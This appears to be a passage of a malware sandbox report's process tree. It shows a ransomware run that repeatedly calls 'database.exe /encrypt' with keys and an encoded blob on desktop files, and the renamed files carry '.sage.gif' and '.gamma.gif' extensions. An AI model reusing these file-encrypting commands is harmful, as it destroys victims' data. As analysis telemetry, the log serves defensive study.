                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ExitGrant.svgz.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\FILES ENCRYPTED.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7812
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\FindRepair.vsdm.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\HideClose.cr2.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7804
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\InitializeAssert.pps.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\InitializeResolve.mhtml.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7824
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\JoinRestart.nfo.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7828
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ProtectOpen.jpeg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\README_sTlLoTpq.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ReceiveExpand.avi.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RemoveSet.mp2v.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ResetCopy.mpeg.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RestoreExpand.fon.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RevokeHide.vsx.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ShowPush.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7904
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
